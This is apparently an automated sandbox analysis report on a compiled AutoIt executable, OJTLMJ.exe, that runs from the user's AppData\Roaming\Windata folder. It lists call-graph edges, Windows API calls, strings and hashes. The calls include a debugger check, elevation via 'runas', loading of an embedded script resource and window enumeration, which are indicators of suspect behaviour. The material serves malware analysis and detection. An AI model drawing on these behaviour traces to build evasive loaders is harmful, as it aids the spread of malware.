104645 db8d76 104637->104645 104647 db8d51 104637->104647 104651 d45322 255 API calls 104637->104651 104638->104543 104654 d8d520 86 API calls 4 library calls 104639->104654 104640->104641 104641->104634 104641->104635 104641->104637 104653 d8d520 86 API calls 4 library calls 104645->104653 104652 d8d520 86 API calls 4 library calls 104647->104652 104649->104545 104650->104637 104651->104637 104652->104638 104653->104638 104654->104638 104655->104620 104656->104622 104658 d43269 104657->104658 104659 d4327f 104658->104659 104662 d9592d InternetCloseHandle InternetCloseHandle WaitForSingleObject 104658->104662 104659->104548 104661->104551 104662->104658 104663->104562 104664->104562 104692 d419ee 104665->104692 104669 da79a4 104669->104613 104670->104613 104671->104613 104673 d4d8ac 104672->104673 104680 d4d8db Mailbox 104672->104680 104674 d4d8b2 Mailbox 104673->104674 104675 d4d8ff 104673->104675 104676 d4d8c7 104674->104676 104678 db4e9b 104674->104678 104677 d4c935 48 API calls 104675->104677 104679 db4e72 VariantClear 104676->104679 104676->104680 104677->104680 104678->104680 104833 d7a599 InterlockedDecrement 104678->104833 104679->104680 104680->104590 104682->104613 104683->104613 104684->104613 104685->104613 104686->104612 104687->104606 104688->104588 104689->104583 104690->104592 104691->104600 104693 d4d89e 50 API calls 104692->104693 104694 d41a08 104693->104694 104695 dbdb7d 104694->104695 104696 d41a12 104694->104696 104698 d47e53 48 API calls 104695->104698 104718 d484a6 104696->104718 104700 dbdb8d 104698->104700 104699 d41a1f 104701 d4c935 48 API calls 104699->104701 104700->104700 104702 d41a2d 104701->104702 104703 d41dce 104702->104703 104704 d41de4 Mailbox 104703->104704 104705 dbdb26 104704->104705 104709 d41dfd 104704->104709 104706 dbdb2b IsWindow 104705->104706 104707 dbdb3f 104706->104707 104708 d41e51 104706->104708 104794 d4200a 48 API calls 104707->104794 104708->104669 104710 d41e46 104709->104710 104712 d484a6 81 API calls 104709->104712 104710->104708 104715 dbdb65 IsWindow 104710->104715 104713 d41e17 104712->104713 104740 d41f04 104713->104740 104714 dbdb4b 104717 d4197e 48 API calls 104714->104717 104715->104707 104715->104708 104717->104708 104719 d484be 104718->104719 104720 d484ba 104718->104720 104721 db5592 __i64tow 104719->104721 104722 d484d2 104719->104722 104723 db5494 104719->104723 104729 d484ea __itow Mailbox _wcscpy 104719->104729 104720->104699 104738 d6234b 80 API calls 4 library calls 104722->104738 104724 db557a 104723->104724 104725 db549d 104723->104725 104739 d6234b 80 API calls 4 library calls 104724->104739 104725->104729 104731 db54bc 104725->104731 104728 d6010a 48 API calls 104730 d484f4 104728->104730 104729->104728 104730->104720 104732 d4caee 48 API calls 104730->104732 104733 d6010a 48 API calls 104731->104733 104732->104720 104734 db54d9 104733->104734 104735 d6010a 48 API calls 104734->104735 104736 db54ff 104735->104736 104736->104720 104737 d4caee 48 API calls 104736->104737 104737->104720 104738->104729 104739->104729 104741 d41f1a Mailbox 104740->104741 104742 d4c935 48 API calls 104741->104742 104743 d41f3e 104742->104743 104744 d4c935 48 API calls 104743->104744 104745 d41f49 104744->104745 104746 d47e53 48 API calls 104745->104746 104747 d41f59 104746->104747 104748 d4d3d2 48 API calls 104747->104748 104749 d41f87 104748->104749 104750 d4d3d2 48 API calls 104749->104750 104751 d41f90 104750->104751 104752 d4d3d2 48 API calls 104751->104752 104753 d41f99 104752->104753 104754 db2569 104753->104754 104755 d41fac 104753->104755 104796 d7e4ea 60 API calls 3 library calls 104754->104796 104756 db2583 104755->104756 104758 d41fbe GetForegroundWindow 104755->104758 104759 d4a4f6 48 API calls 104756->104759 104795 d4200a 48 API calls 104758->104795 104761 db2597 104759->104761 104763 db2899 104761->104763 104764 d4a4f6 48 API calls 104761->104764 104762 d41fcc 104765 d4197e 48 API calls 104762->104765 104766 db28ab 104763->104766 104768 d4c935 48 API calls 104763->104768 104781 db25ad 104764->104781 104767 d41fe1 104765->104767 104769 db28d6 104766->104769 104770 d4b8a7 48 API calls 104766->104770 104778 d41fe4 Mailbox 104767->104778 104768->104766 104771 db28f1 104769->104771 104776 d4b8a7 48 API calls 104769->104776 104772 db28ce CharUpperBuffW 104770->104772 104774 db290b EnumWindows 104771->104774 104775 db28fc GetDesktopWindow EnumChildWindows 104771->104775 104772->104769 104777 db2911 104774->104777 104802 d7e69d 104774->104802 104775->104777 104779 db28e9 CharUpperBuffW 104776->104779 104800 d7e44e 48 API calls Mailbox 104777->104800 104778->104710 104779->104771 104781->104763 104781->104778 104786 db281d 104781->104786 104787 db283c 104781->104787 104791 d4c935 48 API calls 104781->104791 104792 d45cf6 47 API calls 104781->104792 104793 d62241 48 API calls 104781->104793 104797 d7d68d 49 API calls 104781->104797 104798 d45be9 61 API calls 104781->104798 104782 db2922 Mailbox 104783 db2940 104782->104783 104801 d4200a 48 API calls 104782->104801 104785 db2842 GetForegroundWindow 104785->104787 104788 db282a IsWindow 104786->104788 104787->104778 104787->104785 104799 d4200a 48 API calls 104787->104799 104788->104778 104788->104787 104791->104781 104792->104781 104793->104781 104794->104714 104795->104762 104796->104756 104797->104781 104798->104781 104799->104787 104800->104782 104801->104783 104803 d7e6a9 104802->104803 104804 d7e6d4 GetClassNameW 104803->104804 104806 d7e6f7 _wcscmp 104803->104806 104804->104806 104805 d7e70d GetWindowTextW 104807 d7e726 __wsetenvp 104805->104807 104819 d7e73d _wcscmp __wopenfile _wcsstr 104805->104819 104806->104805 104823 d7e7b3 _wcscmp 104806->104823 104811 d7e730 CharUpperBuffW 104807->104811 104808 d7e7c8 GetWindowTextW 104810 d4caee 48 API calls 104808->104810 104809 d7e849 GetClassNameW 104813 d4caee 48 API calls 104809->104813 104814 d7e7e9 104810->104814 104811->104819 104812 d7e8a6 104816 d7e8b7 GetWindowRect 104812->104816 104825 d7e8cc 104812->104825 104815 d7e86a 104813->104815 104830 d47e36 48 API calls 104814->104830 104831 d47e36 48 API calls 104815->104831 104816->104825 104818 d7e791 GetClassNameW 104818->104823 104819->104818 104819->104823 104822 d7e954 104823->104808 104828 d7e833 _wcscmp 104823->104828 104824 d7e877 Mailbox 104824->104812 104832 d7e970 SendMessageTimeoutW EnumChildWindows 104824->104832 104825->104822 104826 d4197e 48 API calls 104825->104826 104826->104822 104827 d7e7f6 Mailbox 104827->104828 104829 d7e811 GetClassNameW 104827->104829 104828->104809 104828->104824 104829->104828 104830->104827 104831->104824 104832->104812 104833->104680 104835 d61eee __setmbcp 104834->104835 104836 d68984 __lock 47 API calls 104835->104836 104846 d61ef5 _doexit 104836->104846 104839 d6200b __setmbcp 104839->103534 104841 d61ff3 104842 d61d65 __mtinitlocknum 3 API calls 104841->104842 104843 d61ffc 104842->104843 104844 d62009 104843->104844 104852 d68ae8 LeaveCriticalSection 104843->104852 104844->103534 104847 d61ffc 104846->104847 104848 d62002 104847->104848 104849 d61fdc 104847->104849 104853 d68ae8 LeaveCriticalSection 104848->104853 104849->104839 104851 d68ae8 LeaveCriticalSection 104849->104851 104851->104841 104852->104844 104853->104849 104854 d429c2 104855 d429cb 104854->104855 104856 d42a46 104855->104856 104857 d42a48 104855->104857 104858 d429e9 104855->104858 104859 d42a2b DefWindowProcW 104856->104859 104860 d42a4e 104857->104860 104861 db2307 104857->104861 104862 d429f6 104858->104862 104863 d42aac PostQuitMessage 104858->104863 104864 d42a39 104859->104864 104865 d42a76 SetTimer RegisterWindowMessageW 104860->104865 104866 d42a53 104860->104866 104867 d4322e 16 API calls 104861->104867 104868 db238f 104862->104868 104869 d42a01 104862->104869 104863->104864 104865->104864 104873 d42a9f CreatePopupMenu 104865->104873 104870 db22aa 104866->104870 104871 d42a5a KillTimer 104866->104871 104872 db232e 104867->104872 104906 d857fb 60 API calls _memset 104868->104906 104874 d42ab6 104869->104874 104875 d42a09 104869->104875 104879 db22af 104870->104879 104880 db22e3 MoveWindow 104870->104880 104899 d42b94 Shell_NotifyIconW _memset 104871->104899 104882 d5ec33 255 API calls 104872->104882 104873->104864 104901 d41e58 53 API calls _memset 104874->104901 104883 d42a14 104875->104883 104884 db2374 104875->104884 104877 db23a1 104877->104859 104877->104864 104888 db22b3 104879->104888 104889 db22d2 SetFocus 104879->104889 104880->104864 104886 d42a1f 104882->104886 104885 db235f 104883->104885 104883->104886 104884->104859 104905 d7b31f 48 API calls 104884->104905 104904 d85fdb 70 API calls _memset 104885->104904 104886->104859 104902 d42b94 Shell_NotifyIconW _memset 104886->104902 104887 d42ac5 104887->104864 104888->104886 104891 db22bc 104888->104891 104889->104864 104890 d42a6d 104900 d42ac7 DeleteObject DestroyWindow Mailbox 104890->104900 104895 d4322e 16 API calls 104891->104895 104895->104864 104897 db2353 104903 d43598 67 API calls _memset 104897->104903 104899->104890 104900->104864 104901->104887 104902->104897 104903->104856 104904->104887 104905->104856 104906->104877

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00D4376D
                                                                                                                  • Part of subcall function 00D44257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe,00000104,?,00000000,00000001,00000000), ref: 00D4428C
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?), ref: 00D4377F
                                                                                                                • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe,00000104,?,00E01120,C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe,00E01124,?,?), ref: 00D437EE
                                                                                                                  • Part of subcall function 00D434F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00D4352A
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00D43860
                                                                                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00DF2934,00000010), ref: 00DB21C5
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00DB21FD
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00DB2232
                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00DDDAA4), ref: 00DB2290
                                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 00DB2297
                                                                                                                  • Part of subcall function 00D430A5: GetSysColorBrush.USER32(0000000F), ref: 00D430B0
                                                                                                                  • Part of subcall function 00D430A5: LoadCursorW.USER32(00000000,00007F00), ref: 00D430BF
                                                                                                                  • Part of subcall function 00D430A5: LoadIconW.USER32(00000063), ref: 00D430D5
                                                                                                                  • Part of subcall function 00D430A5: LoadIconW.USER32(000000A4), ref: 00D430E7
                                                                                                                  • Part of subcall function 00D430A5: LoadIconW.USER32(000000A2), ref: 00D430F9
                                                                                                                  • Part of subcall function 00D430A5: RegisterClassExW.USER32(?), ref: 00D43167
                                                                                                                  • Part of subcall function 00D42E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D42ECB
                                                                                                                  • Part of subcall function 00D42E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D42EEC
                                                                                                                  • Part of subcall function 00D42E9D: ShowWindow.USER32(00000000), ref: 00D42F00
                                                                                                                  • Part of subcall function 00D42E9D: ShowWindow.USER32(00000000), ref: 00D42F09
                                                                                                                  • Part of subcall function 00D43598: _memset.LIBCMT ref: 00D435BE
                                                                                                                  • Part of subcall function 00D43598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D43667
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                • String ID: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"
                                                                                                                • API String ID: 4253510256-4253174962
                                                                                                                • Opcode ID: 344e6313a299be5c30a5f711e1989455112ae282525b8deeff2fd67207281b5a
                                                                                                                • Instruction ID: 570c7bb13377ef6713787ca8cf0c7d5b11d6374ab836585b740cffb1e3bb0978
                                                                                                                • Opcode Fuzzy Hash: 344e6313a299be5c30a5f711e1989455112ae282525b8deeff2fd67207281b5a
                                                                                                                • Instruction Fuzzy Hash: 2D510271644345AFDF10ABA89C46FBD7B69DB15700F0400AAF782F62E1C6718A89CB72

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1086 d5e47b-d5e50a call d4d3d2 GetVersionExW call d47e53 call d5e5f8 call d5e617 1095 db29f9-db29fc 1086->1095 1096 d5e510-d5e511 1086->1096 1099 db29fe 1095->1099 1100 db2a15-db2a19 1095->1100 1097 d5e513-d5e51e 1096->1097 1098 d5e54d-d5e55d call d5e6d1 1096->1098 1103 d5e524-d5e526 1097->1103 1104 db297f-db2985 1097->1104 1117 d5e582-d5e59c 1098->1117 1118 d5e55f-d5e57c GetCurrentProcess call d5e70e 1098->1118 1106 db2a01 1099->1106 1101 db2a1b-db2a24 1100->1101 1102 db2a04-db2a0d 1100->1102 1101->1106 1109 db2a26-db2a29 1101->1109 1102->1100 1110 db299a-db29a6 1103->1110 1111 d5e52c-d5e52f 1103->1111 1107 db298f-db2995 1104->1107 1108 db2987-db298a 1104->1108 1106->1102 1107->1098 1108->1098 1109->1102 1113 db29a8-db29ab 1110->1113 1114 db29b0-db29b6 1110->1114 1115 d5e535-d5e544 1111->1115 1116 db29c6-db29c9 1111->1116 1113->1098 1114->1098 1121 db29bb-db29c1 1115->1121 1122 d5e54a 1115->1122 1116->1098 1123 db29cf-db29e4 1116->1123 1119 d5e5ec-d5e5f6 GetSystemInfo 1117->1119 1120 d5e59e-d5e5b2 call d5e694 1117->1120 1118->1117 1137 d5e57e 1118->1137 1125 d5e5c9-d5e5d5 1119->1125 1134 d5e5e4-d5e5ea GetSystemInfo 1120->1134 1135 d5e5b4-d5e5bc call d5e437 GetNativeSystemInfo 1120->1135 1121->1098 1122->1098 1127 db29ee-db29f4 1123->1127 1128 db29e6-db29e9 1123->1128 1131 d5e5d7-d5e5da FreeLibrary 1125->1131 1132 d5e5dc-d5e5e1 1125->1132 1127->1098 1128->1098 1131->1132 1136 d5e5be-d5e5c2 1134->1136 1135->1136 1136->1125 1140 d5e5c4-d5e5c7 FreeLibrary 1136->1140 1137->1117 1140->1125
                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00D5E4A7
                                                                                                                  • Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00DDDC28,?,?), ref: 00D5E567
                                                                                                                • GetNativeSystemInfo.KERNEL32(?,00DDDC28,?,?), ref: 00D5E5BC
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D5E5C7
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D5E5DA
                                                                                                                • GetSystemInfo.KERNEL32(?,00DDDC28,?,?), ref: 00D5E5E4
                                                                                                                • GetSystemInfo.KERNEL32(?,00DDDC28,?,?), ref: 00D5E5F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2717633055-0
                                                                                                                • Opcode ID: 5f04fd019106bace3f854c96d3b1792f486d5512939e83ed3be00e6f0b4fbdcd
                                                                                                                • Instruction ID: a5a969013e452d2e3c4c99afef288b026f9ea5db803cbf7f4ca05b68464dc500
                                                                                                                • Opcode Fuzzy Hash: 5f04fd019106bace3f854c96d3b1792f486d5512939e83ed3be00e6f0b4fbdcd
                                                                                                                • Instruction Fuzzy Hash: D661B2B2809384CBCF19DF6898C15E97FA5AF2A305F1D45D9DC899B207E624CA0CCB75

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1158 d431f2-d4320a CreateStreamOnHGlobal 1159 d4320c-d43223 FindResourceExW 1158->1159 1160 d4322a-d4322d 1158->1160 1161 db57d3-db57e2 LoadResource 1159->1161 1162 d43229 1159->1162 1161->1162 1163 db57e8-db57f6 SizeofResource 1161->1163 1162->1160 1163->1162 1164 db57fc-db5807 LockResource 1163->1164 1164->1162 1165 db580d-db582b 1164->1165 1165->1162
                                                                                                                APIs
                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D43202
                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00D43219
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00DB57D7
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00DB57EC
                                                                                                                • LockResource.KERNEL32(?), ref: 00DB57FF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                • String ID: SCRIPT
                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                • Opcode ID: 7dc6f5a07e0fbb924059ba7bcba60d96aa97b66afb560fa0615f4006fedf5f38
                                                                                                                • Instruction ID: 3e87d57c59aeb63d2bbcd6003148c736bf6aa34d83e8c47fd733afc805d64abe
                                                                                                                • Opcode Fuzzy Hash: 7dc6f5a07e0fbb924059ba7bcba60d96aa97b66afb560fa0615f4006fedf5f38
                                                                                                                • Instruction Fuzzy Hash: 15117070200702BFD7215B65EC88F27BBBAEBC9B51F14806CB402D6250DBB1DD00C670
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0eac3e371926b3076a04f20c74ada113c6df05c77e21d2e1f38487ab44605a67
                                                                                                                • Instruction ID: 805014a47de3b2d52885956a53e041090571ac6a3ce4fdb045c425509c8b21e9
                                                                                                                • Opcode Fuzzy Hash: 0eac3e371926b3076a04f20c74ada113c6df05c77e21d2e1f38487ab44605a67
                                                                                                                • Instruction Fuzzy Hash: 8F228E70900206DFDB24DF58C490ABAB7F1FF19300F18816AE8969B391E775E985DBB1
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D4E279
                                                                                                                • timeGetTime.WINMM ref: 00D4E51A
                                                                                                                • TranslateMessage.USER32(?), ref: 00D4E646
                                                                                                                • DispatchMessageW.USER32(?), ref: 00D4E651
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D4E664
                                                                                                                • LockWindowUpdate.USER32(00000000), ref: 00D4E697
                                                                                                                • DestroyWindow.USER32 ref: 00D4E6A3
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D4E6BD
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00DB5B15
                                                                                                                • TranslateMessage.USER32(?), ref: 00DB62AF
                                                                                                                • DispatchMessageW.USER32(?), ref: 00DB62BD
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DB62D1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                • API String ID: 2641332412-570651680
                                                                                                                • Opcode ID: 3364df1c518a27b283fbc4a513db50306adac3cd911f5cf470f8ac0cac736f29
                                                                                                                • Instruction ID: 348b0f4f19c914fbb52a54b59a7708e7c243613ce20d849f628f70ca32234787
                                                                                                                • Opcode Fuzzy Hash: 3364df1c518a27b283fbc4a513db50306adac3cd911f5cf470f8ac0cac736f29
                                                                                                                • Instruction Fuzzy Hash: 0162AE70508341EFDB24DF24C885BAA77E5BF44304F08496DF98A9B296DB75D888CB72
                                                                                                                APIs
                                                                                                                • ___createFile.LIBCMT ref: 00D76C73
                                                                                                                • ___createFile.LIBCMT ref: 00D76CB4
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00D76CDD
                                                                                                                • __dosmaperr.LIBCMT ref: 00D76CE4
                                                                                                                • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00D76CF7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00D76D1A
                                                                                                                • __dosmaperr.LIBCMT ref: 00D76D23
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00D76D2C
                                                                                                                • __set_osfhnd.LIBCMT ref: 00D76D5C
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00D76DC6
                                                                                                                • __close_nolock.LIBCMT ref: 00D76DEC
                                                                                                                • __chsize_nolock.LIBCMT ref: 00D76E1C
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00D76E2E
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00D76F26
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00D76F3B
                                                                                                                • __close_nolock.LIBCMT ref: 00D76F9B
                                                                                                                  • Part of subcall function 00D6F84C: CloseHandle.KERNEL32(00000000,00DEEEC4,00000000,?,00D76DF1,00DEEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00D6F89C
                                                                                                                  • Part of subcall function 00D6F84C: GetLastError.KERNEL32(?,00D76DF1,00DEEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00D6F8A6
                                                                                                                  • Part of subcall function 00D6F84C: __free_osfhnd.LIBCMT ref: 00D6F8B3
                                                                                                                  • Part of subcall function 00D6F84C: __dosmaperr.LIBCMT ref: 00D6F8D5
                                                                                                                  • Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00D76FBD
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00D770F2
                                                                                                                • ___createFile.LIBCMT ref: 00D77111
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00D7711E
                                                                                                                • __dosmaperr.LIBCMT ref: 00D77125
                                                                                                                • __free_osfhnd.LIBCMT ref: 00D77145
                                                                                                                • __invoke_watson.LIBCMT ref: 00D77173
                                                                                                                • __wsopen_helper.LIBCMT ref: 00D7718D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                • String ID: @
                                                                                                                • API String ID: 3896587723-2766056989
                                                                                                                • Opcode ID: e41defd23fcc94dd2b58829a11eaf5c9ffff7f68fcd5a7e8be84a8b196019375
                                                                                                                • Instruction ID: 2a286ded02cfdaf79ef768f881c4b91c3232c3386288db261edeaed883024f64
                                                                                                                • Opcode Fuzzy Hash: e41defd23fcc94dd2b58829a11eaf5c9ffff7f68fcd5a7e8be84a8b196019375
                                                                                                                • Instruction Fuzzy Hash: 042223719046069BEB258F68DC52BAE7B71EB01320F28C229E569EB2D1F735CD40D771

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
